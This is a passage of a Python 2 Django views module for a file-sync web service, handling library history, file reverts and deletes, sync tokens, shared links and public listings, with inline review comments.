        seafserv_threaded_rpc.revert_on_server(repo_id, commit_id, request.user.username)
    except SearpcError, e:
        # Map known RPC error strings to user-facing messages.
        if e.msg == 'Bad arguments':
            return render_error(request, _(u'Invalid arguments'))
        elif e.msg == 'No such repo':
            return render_error(request, _(u'Library does not exist'))
        elif e.msg == "Commit doesn't exist":
            return render_error(request, _(u'History you specified does not exist'))
        else:
            return render_error(request, _(u'Unknown error'))

    return HttpResponseRedirect(reverse(repo_history, args=[repo_id]))
def fpath_to_link(repo_id, path, is_dir=False):
    """Return an HTML anchor pointing at the view page for *path* in a repo.

    Directories link to the repo browser, files to the file viewer.
    """
    view_name = "repo" if is_dir else "repo_view_file"
    base_url = reverse(view_name, args=[repo_id])
    href = base_url + '?p=/%s' % urllib2.quote(path.encode('utf-8'))
    return '<a href="%s">%s</a>' % (href, path)
def get_diff(repo_id, arg1, arg2):
    """Summarize the diff between two commits of a repo.

    Returns a dict of lists keyed by change kind ('new', 'removed',
    'renamed', 'modified', 'newdir', 'deldir'). Added/modified/new-dir
    entries are HTML links (via fpath_to_link); removed entries are
    bare names.
    """
    lists = {'new' : [], 'removed' : [], 'renamed' : [], 'modified' : [], \
                 'newdir' : [], 'deldir' : []}

    diff_result = seafserv_threaded_rpc.get_diff(repo_id, arg1, arg2)
    if not diff_result:
        return lists

    for d in diff_result:
        if d.status == "add":
            lists['new'].append(fpath_to_link(repo_id, d.name))
        elif d.status == "del":
            lists['removed'].append(d.name)
        elif d.status == "mov":
            lists['renamed'].append(d.name + " ==> " + fpath_to_link(repo_id, d.new_name))
        elif d.status == "mod":
            lists['modified'].append(fpath_to_link(repo_id, d.name))
        elif d.status == "newdir":
            lists['newdir'].append(fpath_to_link(repo_id, d.name, is_dir=True))
        elif d.status == "deldir":
            lists['deldir'].append(d.name)

    return lists
@login_required
def repo_history_changes(request, repo_id):
    """AJAX endpoint: return the diff of a commit as JSON.

    On any access/validation problem an empty dict is returned rather
    than an error status.
    """
    changes = {}
    content_type = 'application/json; charset=utf-8'

    if not access_to_repo(request, repo_id, ''):
        return HttpResponse(json.dumps(changes), content_type=content_type)

    repo = get_repo(repo_id)
    if not repo:
        return HttpResponse(json.dumps(changes), content_type=content_type)

    if repo.encrypted and not is_passwd_set(repo_id, request.user.username):
        return HttpResponse(json.dumps(changes), content_type=content_type)

    commit_id = request.GET.get('commit_id', '')
    if not commit_id:
        return HttpResponse(json.dumps(changes), content_type=content_type)

    # Diff against the empty ref: the commit's full change set.
    changes = get_diff(repo_id, '', commit_id)

    c = get_commit(commit_id)
    if c.parent_id is None:
        # A commit is a first commit only if it's parent id is None.
        changes['cmt_desc'] = repo.desc
    elif c.second_parent_id is None:
        # Normal commit only has one parent.
        if c.desc.startswith('Changed library'):
            changes['cmt_desc'] = _('Changed library name or description')
    else:
        # A commit is a merge only if it has two parents.
        changes['cmt_desc'] = _('No conflict in the merge.')

    return HttpResponse(json.dumps(changes), content_type=content_type)
@login_required
def modify_token(request, repo_id):
    """Set a new sync token for the repo (owner only), then redirect
    back to the repo page."""
    if validate_owner(request, repo_id):
        new_token = request.POST.get('token', '')
        if new_token:
            seafserv_threaded_rpc.set_repo_token(repo_id, new_token)
    return HttpResponseRedirect(reverse('repo', args=[repo_id]))
@login_required
def repo_remove(request, repo_id):
    """Delete a library, in either an org or a personal context.

    Only the repo owner or a staff member may delete. On success the
    ``repo_deleted`` signal is emitted with the affected users; finally
    the view redirects back to the referrer (or site root).
    """
    repo = get_repo(repo_id)
    if not repo:
        return render_error(request, _(u'Library does not exist'))
    user = request.user.username

    org, base_template = check_and_get_org_by_repo(repo_id, user)
    if org:
        # Remove repo in org context, only repo owner or org staff can
        # perform this operation.
        if request.user.is_staff or org.is_staff or \
                is_org_repo_owner(org.org_id, repo_id, user):
            # Must get related users before removing the repo
            usernames = get_related_users_by_org_repo(org.org_id, repo_id)
            remove_repo(repo_id)
            repo_deleted.send(sender=None,
                              org_id=org.org_id,
                              usernames=usernames,
                              repo_owner=user,
                              repo_id=repo_id,
                              repo_name=repo.name,
                              )
        else:
            err_msg = _(u'Failed to remove library. Only staff or owner can perform this operation.')
            messages.error(request, err_msg)
    else:
        # Remove repo in personal context, only repo owner or site staff can
        # perform this operation.
        if validate_owner(request, repo_id) or request.user.is_staff:
            usernames = get_related_users_by_repo(repo_id)
            remove_repo(repo_id)
            repo_deleted.send(sender=None,
                              org_id=-1,
                              usernames=usernames,
                              repo_owner=user,
                              repo_id=repo_id,
                              repo_name=repo.name,
                              )
            # NOTE(review): only the personal branch shows a success message;
            # the org branch stays silent on success — confirm intended.
            messages.success(request, _(u'Successfully deleted library "%s".') % repo.name)
        else:
            err_msg = _(u'Failed to remove library. Only staff or owner can perform this operation.')
            messages.error(request, err_msg)

    next = request.META.get('HTTP_REFERER', None)
    if not next:
        next = settings.SITE_ROOT

    return HttpResponseRedirect(next)
@login_required
def myhome(request):
    """Render the user's home page: quota, owned/shared/group repos,
    sub-libraries, notifications, contacts and traffic stats."""
    owned_repos = []

    email = request.user.username
    quota = seafserv_threaded_rpc.get_user_quota(email)

    quota_usage = 0
    share_usage = 0
    my_usage = get_user_quota_usage(email)
    if CALC_SHARE_USAGE:
        # Sharing counts against quota when the site enables it.
        share_usage = get_user_share_usage(email)
        quota_usage = my_usage + share_usage
    else:
        quota_usage = my_usage

    # Get all personal groups I joined.
    joined_groups = get_personal_groups_by_user(request.user.username)

    def get_abbrev_origin_path(repo_name, path):
        # Shorten long origin paths to their last 20 characters for display.
        if len(path) > 20:
            abbrev_path = path[-20:]
            return repo_name + '/...' + abbrev_path
        else:
            return repo_name + path

    # compose abbrev origin path for display
    sub_repos = []
    if ENABLE_SUB_LIBRARY:
        sub_repos = wingufile_api.get_virtual_repos_by_owner(email)
        for repo in sub_repos:
            repo.abbrev_origin_path = get_abbrev_origin_path(repo.origin_repo_name,
                                                             repo.origin_path)
        calculate_repos_last_modify(sub_repos)
        sub_repos.sort(lambda x, y: cmp(y.latest_modify, x.latest_modify))

    # Personal repos that I owned, newest modification first.
    owned_repos = seafserv_threaded_rpc.list_owned_repos(email)
    calculate_repos_last_modify(owned_repos)
    owned_repos.sort(lambda x, y: cmp(y.latest_modify, x.latest_modify))

    # Personal repos others shared to me
    in_repos = list_personal_shared_repos(email, 'to_email', -1, -1)

    # For each group I joined...
    for grp in joined_groups:
        # Get group repos, and for each group repos...
        for r_id in get_group_repoids(grp.id):
            # No need to list my own repo
            if is_repo_owner(email, r_id):
                continue
            # Convert repo properties due to the different columns in Repo
            # and SharedRepo
            r = get_repo(r_id)
            if not r:
                continue
            r.repo_id = r.id
            r.repo_name = r.name
            r.repo_desc = r.desc
            r.last_modified = get_repo_last_modify(r)
            r.share_type = 'group'
            r.user = get_repo_owner(r_id)
            r.user_perm = check_permission(r_id, email)
            in_repos.append(r)
    in_repos.sort(lambda x, y: cmp(y.last_modified, x.last_modified))

    # user notifications
    grpmsg_list = []
    grpmsg_reply_list = []
    joined_group_ids = [x.id for x in joined_groups]
    notes = UserNotification.objects.filter(to_user=request.user.username)
    for n in notes:
        if n.msg_type == 'group_msg':
            # Skip notifications from groups the user is no longer in.
            if int(n.detail) not in joined_group_ids:
                continue
            grp = get_group(int(n.detail))
            grpmsg_list.append(grp)
        elif n.msg_type == 'grpmsg_reply':
            grpmsg_reply_list.append(n.detail)

    # get nickname
    profiles = Profile.objects.filter(user=request.user.username)
    nickname = profiles[0].nickname if profiles else ''

    autocomp_groups = joined_groups
    contacts = Contact.objects.get_registered_contacts_by_user(email)

    # Public sharing is disabled in cloud mode.
    allow_public_share = False if request.cloud_mode else True

    starred_files = get_starred_files(request.user.username)

    traffic_stat = 0
    if TRAFFIC_STATS_ENABLED:
        # User's network traffic stat in this month
        # NOTE(review): this local ``stat`` shadows the module-level
        # ``stat`` import from here on in this function.
        stat = get_user_traffic_stat(request.user.username)
        if stat:
            traffic_stat = stat['file_view'] + stat['file_download'] + stat['dir_download']

    return render_to_response('myhome.html', {
            "nickname": nickname,
            "owned_repos": owned_repos,
            "quota": quota,
            "quota_usage": quota_usage,
            "CALC_SHARE_USAGE": CALC_SHARE_USAGE,
            "share_usage": share_usage,
            "my_usage": my_usage,
            "in_repos": in_repos,
            "contacts": contacts,
            "joined_groups": joined_groups,
            "autocomp_groups": autocomp_groups,
            "notes": notes,
            "grpmsg_list": grpmsg_list,
            "grpmsg_reply_list": grpmsg_reply_list,
            "create_shared_repo": False,
            "allow_public_share": allow_public_share,
            "starred_files": starred_files,
            "TRAFFIC_STATS_ENABLED": TRAFFIC_STATS_ENABLED,
            "traffic_stat": traffic_stat,
            "ENABLE_PAYMENT": getattr(settings, 'ENABLE_PAYMENT', False),
            "ENABLE_SUB_LIBRARY": ENABLE_SUB_LIBRARY,
            "ENABLE_EVENTS": EVENTS_ENABLED,
            "sub_repos": sub_repos,
            }, context_instance=RequestContext(request))
@login_required
def client_mgmt(request):
    """List the repo sync tokens (clients) registered for the current user,
    sorted by repo name."""
    username = request.user.username

    clients = []
    try:
        clients = wingufile_api.list_repo_tokens_by_email(username)
    except Exception as e:
        # Best effort: an RPC failure just yields an empty client list, but
        # log the cause instead of swallowing it with a bare ``except``.
        logger.error('Failed to list repo tokens for %s: %s' % (username, e))

    if clients:
        clients.sort(key=lambda client: client.repo_name)

    return render_to_response('client_mgmt.html', {
            'clients': clients,
            }, context_instance=RequestContext(request))
@login_required
def client_unsync(request):
    """Revoke a sync client's repo token ("unsync"), then redirect back
    to the referrer (or site root), reporting success/failure via messages."""
    repo_id = request.GET.get('repo_id', '')
    token = request.GET.get('token', '')
    username = request.user.username
    client_name = request.GET.get('name', '')

    if repo_id and token:
        try:
            wingufile_api.delete_repo_token(repo_id, token, username)
            if client_name:
                messages.success(request, _(u'Successfully unsync client %s') % client_name)
            else:
                messages.success(request, _(u'Successfully unsync client'))
        except Exception as e:
            # Narrowed from a bare ``except``: keep the user-facing error
            # message but record the underlying cause.
            logger.error('Failed to unsync client for %s: %s' % (username, e))
            if client_name:
                messages.error(request, _(u'Failed to unsync client %s') % client_name)
            else:
                messages.error(request, _(u'Failed to unsync client'))

    next = request.META.get('HTTP_REFERER', None)
    if not next:
        next = settings.SITE_ROOT
    return HttpResponseRedirect(next)
# @login_required
# def innerpub_msg_reply(request, msg_id):
# """Show inner pub message replies, and process message reply in ajax"""
# content_type = 'application/json; charset=utf-8'
# if request.is_ajax():
# ctx = {}
# if request.method == 'POST':
# form = MessageReplyForm(request.POST)
# # TODO: invalid form
# if form.is_valid():
# msg = form.cleaned_data['message']
# try:
# innerpub_msg = InnerPubMsg.objects.get(id=msg_id)
# except InnerPubMsg.DoesNotExist:
# return HttpResponseBadRequest(content_type=content_type)
# msg_reply = InnerPubMsgReply()
# msg_reply.reply_to = innerpub_msg
# msg_reply.from_email = request.user.username
# msg_reply.message = msg
# msg_reply.save()
# ctx['reply'] = msg_reply
# html = render_to_string("group/group_reply_new.html", ctx)
# else:
# try:
# msg = InnerPubMsg.objects.get(id=msg_id)
# except InnerPubMsg.DoesNotExist:
# raise HttpResponse(status=400)
# replies = InnerPubMsgReply.objects.filter(reply_to=msg)
# ctx['replies'] = replies
# html = render_to_string("group/group_reply_list.html", ctx)
# serialized_data = json.dumps({"html": html})
# return HttpResponse(serialized_data, content_type=content_type)
# else:
# return HttpResponseBadRequest(content_type=content_type)
@login_required
def public_repo_create(request):
    '''
    Handle ajax post to create public repo.
    '''
    if not request.is_ajax() or request.method != 'POST':
        # Bug fix: ``Http404`` must be raised, not returned — the original
        # ``return Http404`` handed Django the exception class instead of a
        # response object.
        raise Http404

    result = {}
    content_type = 'application/json; charset=utf-8'

    form = SharedRepoCreateForm(request.POST)
    if form.is_valid():
        repo_name = form.cleaned_data['repo_name']
        repo_desc = form.cleaned_data['repo_desc']
        permission = form.cleaned_data['permission']
        passwd = form.cleaned_data['passwd']
        user = request.user.username

        try:
            # create a repo
            repo_id = seafserv_threaded_rpc.create_repo(repo_name, repo_desc,
                                                        user, passwd)
            # set this repo as inner pub
            seafserv_threaded_rpc.set_inner_pub_repo(repo_id, permission)
        except Exception as e:
            # Narrowed from a bare ``except``: keep the best-effort behavior
            # (report failure via JSON) but record the cause.
            logger.error('Failed to create public repo: %s' % e)
            repo_id = None
        if not repo_id:
            result['error'] = _(u'Failed to create library')
        else:
            result['success'] = True
            repo_created.send(sender=None,
                              org_id=-1,
                              creator=user,
                              repo_id=repo_id,
                              repo_name=repo_name)
        return HttpResponse(json.dumps(result), content_type=content_type)
    else:
        return HttpResponseBadRequest(json.dumps(form.errors),
                                      content_type=content_type)
@login_required
def unsetinnerpub(request, repo_id):
    """Remove a library from the inner (organization-wide) public list,
    then redirect to the share-admin page."""
    repo = get_repo(repo_id)
    if repo is None:
        messages.error(request, _('Failed to unshare the library, as it does not exist.'))
    else:
        try:
            unset_inner_pub_repo(repo_id)
            messages.success(request, _('Unshare "%s" successfully.') % repo.name)
        except SearpcError:
            messages.error(request, _('Failed to unshare "%s".') % repo.name)
    return HttpResponseRedirect(reverse('share_admin'))
# @login_required
# def ownerhome(request, owner_name):
# owned_repos = []
# quota_usage = 0
# owned_repos = seafserv_threaded_rpc.list_owned_repos(owner_name)
# quota_usage = seafserv_threaded_rpc.get_user_quota_usage(owner_name)
# user_dict = user_info(request, owner_name)
# return render_to_response('ownerhome.html', {
# "owned_repos": owned_repos,
# "quota_usage": quota_usage,
# "owner": owner_name,
# "user_dict": user_dict,
# }, context_instance=RequestContext(request))
@login_required
def repo_set_access_property(request, repo_id):
    """Persist the repo access property from the ``ap`` query parameter,
    then redirect back to the repo page."""
    access_property = request.GET.get('ap', '')
    seafserv_threaded_rpc.repo_set_access_property(repo_id, access_property)

    return HttpResponseRedirect(reverse('repo', args=[repo_id]))
@login_required
def repo_del_file(request, repo_id):
    """Delete a single file from a library (requires 'rw' permission),
    then redirect back to the parent directory listing."""
    if get_user_permission(request, repo_id) != 'rw':
        return render_permission_error(request, _('Failed to delete file.'))

    parent_dir = request.GET.get("p", "/")
    file_name = request.GET.get("file_name")
    user = request.user.username
    try:
        seafserv_threaded_rpc.del_file(repo_id, parent_dir, file_name, user)
        messages.success(request, _(u'%s successfully deleted.') % file_name)
    except Exception as e:
        # Narrowed from a bare ``except``: the user still sees a friendly
        # error, but the real cause is now logged.
        logger.error('Failed to delete %s in repo %s: %s' % (file_name, repo_id, e))
        messages.error(request, _(u'Internal error. Failed to delete %s.') % file_name)

    url = reverse('repo', args=[repo_id]) + ('?p=%s' % urllib2.quote(parent_dir.encode('utf-8')))
    return HttpResponseRedirect(url)
def repo_access_file(request, repo_id, obj_id):
    """Serve a file object by redirecting the client to the httpserver URL.

    Access is granted when the user has repo- or file-level permission, or
    when the request carries a valid shared-link token (``t``). Downloads
    through shared links are also reported to the stats service.
    """
    repo = get_repo(repo_id)
    if not repo:
        raise Http404

    # Encrypted repos require the password to be set in this session.
    password_set = False
    if repo.props.encrypted:
        try:
            ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
            if ret == 1:
                password_set = True
        except SearpcError, e:
            return render_error(request, e.msg)

    if repo.props.encrypted and not password_set:
        return HttpResponseRedirect(reverse('repo', args=[repo_id]))

    op = request.GET.get('op', 'view')
    file_name = request.GET.get('file_name', '')

    if op == 'del':
        return repo_del_file(request, repo_id)

    # If vistor's file shared token in url params matches the token in db,
    # then we know the vistor is from file shared link.
    # NOTE(review): ``FileShare.objects.get`` raises DoesNotExist for an
    # unknown token — confirm callers always pass a valid one.
    share_token = request.GET.get('t', '')
    fileshare = FileShare.objects.get(token=share_token) if share_token else None
    shared_by = None
    if fileshare:
        from_shared_link = True
        shared_by = fileshare.username
    else:
        from_shared_link = False

    username = request.user.username
    path = request.GET.get('p', '')
    if get_repo_access_permission(repo_id, username) or \
            get_file_access_permission(repo_id, path, username) or from_shared_link:
        # Get a token to access file
        token = seafserv_rpc.web_get_access_token(repo_id, obj_id, op, username)
    else:
        return render_permission_error(request, _(u'Unable to access file'))

    redirect_url = gen_file_get_url(token, file_name)

    if from_shared_link:
        # send stats message
        try:
            file_size = seafserv_threaded_rpc.get_file_size(obj_id)
            send_message('winguhub.stats', 'file-download\t%s\t%s\t%s\t%s' % \
                         (repo.id, shared_by, obj_id, file_size))
        except Exception, e:
            logger.error('Error when sending file-download message: %s' % str(e))

    return HttpResponseRedirect(redirect_url)
def get_repo_download_url(request, repo_id):
    """Build the ccnet-applet URL used by the desktop client to sync a library.

    Returns a ``(url, error_message)`` pair; exactly one of the two is
    non-empty.  Callers must check the second element before redirecting.
    """
    repo = seafserv_threaded_rpc.get_repo(repo_id)
    repo_name = repo.props.name
    quote_repo_name = quote(repo_name.encode('utf-8'))
    encrypted = repo.props.encrypted
    if encrypted:
        enc = '1'
    else:
        enc = ''
    relay_id = get_session_info().id
    if not relay_id:
        return '', _(u"Failed to download library, unable to find server")

    try:
        token = seafserv_threaded_rpc.generate_repo_token \
                (repo_id, request.user.username)
    except Exception, e:
        return '', str(e)

    addr, port = get_ccnet_server_addr_port ()
    if not (addr and port):
        return '', _(u"Invalid server setting")

    ccnet_applet_root = get_ccnetapplet_root()
    email = urllib2.quote(request.user.username.encode('utf-8'))

    # Assemble the applet URL with relay, identity and repo parameters.
    url = ccnet_applet_root + "/repo/download/"
    url += "?relay_id=%s&relay_addr=%s&relay_port=%s" % (relay_id, addr, port)
    url += "&email=%s&token=%s" % (email, token)
    url += "&repo_id=%s&repo_name=%s" % (repo_id, quote_repo_name)
    if enc:
        # Encrypted repos also carry the magic value needed by the client.
        url += "&encrypted=1&magic=%s" % repo.magic

    return url, ''
@login_required
def repo_download(request):
    """Redirect the user to the applet URL that downloads/syncs a library."""
    repo_id = request.GET.get('repo_id', '')
    repo = get_repo(repo_id)
    if repo is None:
        raise Http404

    download_url, err = get_repo_download_url(request, repo_id)
    if err:
        return render_to_response('error.html', {
                "error_msg": err
                }, context_instance=RequestContext(request))

    return HttpResponseRedirect(download_url)
@login_required
def wingufile_access_check(request):
    """Render the page that probes whether the local client applet is running
    before handing it the library download URL."""
    repo_id = request.GET.get('repo_id', '')
    repo = get_repo(repo_id)
    if repo is None:
        raise Http404

    applet_root = get_ccnetapplet_root()
    download_url, err = get_repo_download_url (request, repo_id)
    if err:
        return render_to_response('error.html', {
                "error_msg": err
                }, context_instance=RequestContext(request))

    return render_to_response('wingufile_access_check.html', {
            'repo_id': repo_id,
            'applet_root': applet_root,
            'download_url': download_url,
            }, context_instance=RequestContext(request))
@login_required
def file_upload_progress_page(request):
    '''
    As iframe in repo_upload_file.html, for solving problem in chrome.
    '''
    ctx = {
        'uuid': request.GET.get('uuid', ''),
        'httpserver_root': get_httpserver_root(),
        'upload_progress_con_id': request.GET.get('upload_progress_con_id', ''),
    }
    return render_to_response('file_upload_progress_page.html', ctx,
                              context_instance=RequestContext(request))
@login_required
def validate_filename(request):
    """Ajax helper: ask the backend whether *filename* is legal.

    Responds with JSON ``{'ret': 'yes'|'no'|'error'}``; 'error' means the
    RPC to the storage daemon failed.
    """
    repo_id = request.GET.get('repo_id')
    filename = request.GET.get('filename')

    if not (repo_id and filename):
        return render_error(request)

    result = {'ret':'yes'}

    try:
        ret = is_valid_filename(filename)
    except SearpcError:
        result['ret'] = 'error'
    else:
        result['ret'] = 'yes' if ret == 1 else 'no'

    content_type = 'application/json; charset=utf-8'
    return HttpResponse(json.dumps(result), content_type=content_type)
@login_required
def repo_create(request):
    '''
    Handle ajax post to create a library.

    Responds with JSON: {'success': True} on success, {'error': msg} on
    failure, or the form errors with status 400 when validation fails.
    '''
    if not request.is_ajax() or request.method != 'POST':
        # BUG FIX: was `return Http404`, which returned the exception *class*
        # instead of producing a 404 response; Http404 must be raised.
        raise Http404

    result = {}
    content_type = 'application/json; charset=utf-8'

    form = RepoCreateForm(request.POST)
    if form.is_valid():
        repo_name = form.cleaned_data['repo_name']
        repo_desc = form.cleaned_data['repo_desc']
        passwd = form.cleaned_data['passwd']
        user = request.user.username

        try:
            repo_id = seafserv_threaded_rpc.create_repo(repo_name, repo_desc,
                                                        user, passwd)
        except Exception:
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are no longer swallowed; any RPC failure still maps to the
            # generic error below.
            repo_id = None
        if not repo_id:
            result['error'] = _(u"Failed to create library")
        else:
            result['success'] = True
            repo_created.send(sender=None,
                              org_id=-1,
                              creator=user,
                              repo_id=repo_id,
                              repo_name=repo_name)
        return HttpResponse(json.dumps(result), content_type=content_type)
    else:
        return HttpResponseBadRequest(json.dumps(form.errors),
                                      content_type=content_type)
def render_file_revisions (request, repo_id):
    """List all history versions of a file."""
    path = request.GET.get('p', '/')
    if path[-1] == '/':
        path = path[:-1]
    u_filename = os.path.basename(path)
    # NOTE(review): `filename` is computed but never used below — candidate
    # for removal; kept to preserve behavior.
    filename = urllib2.quote(u_filename.encode('utf-8'))

    if not path:
        return render_error(request)

    repo = get_repo(repo_id)
    if not repo:
        error_msg = _(u"Library does not exist")
        return render_error(request, error_msg)

    # Only plain-text-like files can be diffed against older revisions.
    filetype = get_file_type_and_ext(u_filename)[0].lower()
    if filetype == 'text' or filetype == 'markdown':
        can_compare = True
    else:
        can_compare = False

    try:
        commits = seafserv_threaded_rpc.list_file_revisions(repo_id, path,
                                                            -1, -1)
    except SearpcError, e:
        logger.error(e.msg)
        return render_error(request, e.msg)

    if not commits:
        return render_error(request)

    # Check whether user is repo owner
    if validate_owner(request, repo_id):
        is_owner = True
    else:
        is_owner = False

    try:
        # Annotate each commit with the file's id and size at that revision.
        for commit in commits:
            file_id, file_size = get_file_revision_id_size (commit.id, path)
            if not file_id or file_size is None:
                # do not use 'not file_size', since it's ok to have file_size = 0
                return render_error(request)
            commit.revision_file_size = file_size
            commit.file_id = file_id
    except Exception, e:
        return render_error(request, str(e))

    zipped = gen_path_link(path, repo.name)

    search_repo_id = None
    if not repo.encrypted:
        search_repo_id = repo.id

    return render_to_response('file_revisions.html', {
        'repo': repo,
        'path': path,
        'u_filename': u_filename,
        'zipped': zipped,
        'commits': commits,
        'is_owner': is_owner,
        'can_compare': can_compare,
        'search_repo_id': search_repo_id,
        }, context_instance=RequestContext(request))
@login_required
def repo_revert_file (request, repo_id):
    """Revert a single file to the version it had at *commit*.

    GET params: commit (commit id), p (file path), from (originating page:
    'repo_history', 'recycle', or a file-history page).  The redirect target
    depends on where the user came from.
    """
    commit_id = request.GET.get('commit')
    path = request.GET.get('p')
    from_page = request.GET.get('from')

    if not (commit_id and path and from_page):
        return render_error(request, _(u"Invalid arguments"))

    try:
        ret = seafserv_threaded_rpc.revert_file (repo_id, commit_id,
                                                 path.encode('utf-8'), request.user.username)
    except Exception, e:
        return render_error(request, str(e))
    else:
        if from_page == 'repo_history':
            # When revert file from repo history, we redirect to repo history
            url = reverse('repo', args=[repo_id]) + u'?commit_id=%s&history=y' % commit_id
        elif from_page == 'recycle':
            # When revert from recycle page, redirect to recycle page.
            url = reverse('repo_recycle_view', args=[repo_id])
        else:
            # When revert file from file history, we redirect to parent dir of this file
            parent_dir = os.path.dirname(path)
            url = reverse('repo', args=[repo_id]) + ('?p=%s' % urllib2.quote(parent_dir.encode('utf-8')))

        # ret == 1 means the containing folder no longer exists and the file
        # was restored to the library root instead — presumably; confirm
        # against seafserv revert_file semantics.
        if ret == 1:
            root_url = reverse('repo', args=[repo_id]) + u'?p=/'
            msg = _(u'Successfully revert %(path)s to <a href="%(root)s">root directory.</a>') % {"path":path.lstrip('/'), "root":root_url}
            messages.add_message(request, messages.INFO, msg)
        else:
            file_view_url = reverse('repo_view_file', args=[repo_id]) + u'?p=' + urllib2.quote(path.encode('utf-8'))
            msg = _(u'Successfully revert <a href="%(url)s">%(path)s</a>') % {"url":file_view_url, "path":path.lstrip('/')}
            messages.add_message(request, messages.INFO, msg)
        return HttpResponseRedirect(url)
@login_required
def repo_revert_dir (request, repo_id):
    """Revert a directory to the state it had at *commit*; always returns
    to the recycle-bin page afterwards."""
    commit_id = request.GET.get('commit')
    path = request.GET.get('p')

    if not (commit_id and path):
        return render_error(request, _(u"Invalid arguments"))

    try:
        ret = seafserv_threaded_rpc.revert_dir (repo_id, commit_id,
                                                path.encode('utf-8'), request.user.username)
    except Exception, e:
        return render_error(request, str(e))
    else:
        url = reverse('repo_recycle_view', args=[repo_id])

        # ret == 1: restored to library root (parent gone) — presumably;
        # mirrors repo_revert_file above.
        if ret == 1:
            root_url = reverse('repo', args=[repo_id]) + u'?p=/'
            msg = _(u'Successfully revert %(path)s to <a href="%(url)s">root directory.</a>') % {"path":path.lstrip('/'), "url":root_url}
            messages.add_message(request, messages.INFO, msg)
        else:
            dir_view_url = reverse('repo', args=[repo_id]) + u'?p=' + urllib2.quote(path.encode('utf-8'))
            msg = _(u'Successfully revert <a href="%(url)s">%(path)s</a>') % {"url":dir_view_url, "path":path.lstrip('/')}
            messages.add_message(request, messages.INFO, msg)
        return HttpResponseRedirect(url)
@login_required
def file_revisions(request, repo_id):
    """Entry point for file history: without `op` render the revision list,
    with `op=download` redirect to the download URL of one revision."""
    if request.method != 'GET':
        return render_error(request)

    op = request.GET.get('op')
    if not op:
        return render_file_revisions(request, repo_id)
    elif op != 'download':
        return render_error(request)

    commit_id = request.GET.get('commit')
    path = request.GET.get('p')

    if not (commit_id and path):
        return render_error(request)

    if op == 'download':
        def handle_download():
            # Look the file up inside the directory listing of the target
            # commit so we can resolve its object id at that revision.
            parent_dir = os.path.dirname(path)
            file_name = os.path.basename(path)
            seafdir = wingufile_api.list_dir_by_commit_and_path (commit_id,
                                                                 parent_dir)
            if not seafdir:
                return render_error(request)

            # for ... else ...: the else runs only if the loop never breaks,
            # i.e. the file was not found in that commit.
            for dirent in seafdir:
                if dirent.obj_name == file_name:
                    break
            else:
                return render_error(request)

            url = reverse('repo_access_file', args=[repo_id, dirent.obj_id])
            url += '?file_name=%s&op=download' % urllib2.quote(file_name.encode('utf-8'))
            return HttpResponseRedirect(url)

        try:
            return handle_download()
        except Exception, e:
            return render_error(request, str(e))
def view_shared_dir(request, token):
    """Render a directory reached through a shared-directory link.

    Anonymous access: authorization comes solely from the link token.
    The requested path is clamped so visitors cannot browse above the
    shared directory.
    """
    assert token is not None    # Checked by URLconf

    try:
        fileshare = FileShare.objects.get(token=token)
    except FileShare.DoesNotExist:
        raise Http404

    username = fileshare.username
    repo_id = fileshare.repo_id
    path = request.GET.get('p', '')
    path = fileshare.path if not path else path
    if path[-1] != '/':         # Normalize dir path
        path += '/'

    if not path.startswith(fileshare.path):
        path = fileshare.path   # Can not view upper dir of shared dir

    repo = get_repo(repo_id)
    if not repo:
        raise Http404

    dir_name = os.path.basename(path[:-1])
    current_commit = get_commits(repo_id, 0, 1)[0]
    file_list, dir_list = get_repo_dirents(request, repo_id, current_commit,
                                           path)
    zipped = gen_path_link(path, '')

    if path == fileshare.path:  # When user views the shared dir..
        # increase shared link view_cnt (F() keeps the update atomic in SQL)
        fileshare = FileShare.objects.get(token=token)
        fileshare.view_cnt = F('view_cnt') + 1
        fileshare.save()

    return render_to_response('view_shared_dir.html', {
            'repo': repo,
            'token': token,
            'path': path,
            'username': username,
            'dir_name': dir_name,
            'file_list': file_list,
            'dir_list': dir_list,
            'zipped': zipped,
            }, context_instance=RequestContext(request))
def demo(request):
    """
    Login as demo account.
    """
    user = authenticate(username='<EMAIL>',
                        password='<PASSWORD>')
    auth_login(request, user)
    return HttpResponseRedirect(settings.SITE_ROOT)
@login_required
def pubrepo(request):
    """
    Show public libraries.

    Disabled (404) in cloud mode, where cross-tenant listings must not leak.
    """
    if request.cloud_mode:
        # Users are not allowed to see public information when in cloud mode.
        raise Http404
    else:
        public_repos = list_inner_pub_repos(request.user.username)
        pubrepos_count = len(public_repos)
        groups_count = len(get_personal_groups(-1, -1))
        emailusers_count = count_emailusers()
        return render_to_response('pubrepo.html', {
                'public_repos': public_repos,
                'create_shared_repo': True,
                'pubrepos_count': pubrepos_count,
                'groups_count': groups_count,
                'emailusers_count': emailusers_count,
                }, context_instance=RequestContext(request))
@login_required
def pubgrp(request):
    """
    Show public groups.

    Disabled (404) in cloud mode, mirroring pubrepo above.
    """
    if request.cloud_mode:
        # Users are not allowed to see public information when in cloud mode.
        raise Http404
    else:
        groups = get_personal_groups(-1, -1)
        pubrepos_count = count_inner_pub_repos()
        groups_count = len(groups)
        emailusers_count = count_emailusers()
        return render_to_response('pubgrp.html', {
                'groups': groups,
                'pubrepos_count': pubrepos_count,
                'groups_count': groups_count,
                'emailusers_count': emailusers_count,
                }, context_instance=RequestContext(request))
@login_required
def pubuser(request):
    """
    Show public users, paginated 20 per page.

    Each listed user is flagged with `can_be_contact` — False for the
    requesting user himself and for users already in his contact list.
    Disabled (404) in cloud mode.
    """
    if request.cloud_mode:
        # Users are not allowed to see public information when in cloud mode.
        raise Http404
    else:
        emailusers_count = seaserv.count_emailusers()
        pubrepos_count = seaserv.count_inner_pub_repos()
        groups_count = len(seaserv.get_personal_groups(-1, -1))

        '''paginate'''
        # Make sure page request is an int. If not, deliver first page.
        try:
            current_page = int(request.GET.get('page', '1'))
        except ValueError:
            current_page = 1
        per_page = 20           # show 20 users per-page
        # Fetch one extra row: its presence tells us whether a next page exists.
        users_plus_one = seaserv.get_emailusers(per_page * (current_page - 1),
                                                per_page + 1)
        has_prev = current_page > 1
        has_next = len(users_plus_one) == per_page + 1
        num_pages = int(ceil(emailusers_count / float(per_page)))
        page_range = get_page_range(current_page, num_pages)

        users = users_plus_one[:per_page]
        username = request.user.username
        contacts = Contact.objects.get_contacts_by_user(username)
        # Use a set for O(1) membership tests below.
        contact_emails = set(c.contact_email for c in contacts)
        for u in users:
            # One's self and existing contacts can not be added again.
            u.can_be_contact = u.email != username and \
                u.email not in contact_emails

